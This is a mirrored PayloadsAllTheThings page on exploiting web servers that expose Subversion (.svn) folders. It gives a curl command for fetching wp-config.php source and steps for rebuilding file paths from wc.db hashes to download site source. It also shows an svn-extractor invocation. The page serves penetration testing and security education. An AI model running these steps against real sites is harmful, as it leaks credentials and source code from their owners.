Mirrors/PayloadsAllTheThings

mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-12 14:22:47 +00:00

Swissky ccffaa5019 References updated for IDOR, Radomness and SCM

2024-11-07 12:17:38 +01:00

1.3 KiB

Raw Blame History

Subversion

Summary

Examples
Tools
- svn-extractor
References

Examples

curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base

Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db

INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);

Download interesting files

remove $sha1$ prefix
add .svn-base postfix
use first byte from hash as a subdirectory of the pristine/ directory (94 in this case)
create complete path, which will be: http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base

Tools

svn-extractor

anantshri/svn-extractor - Simple script to extract all web resources by means of .SVN folder exposed over network.
```
python svn-extractor.py --url "url with .svn available"
```

References

SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013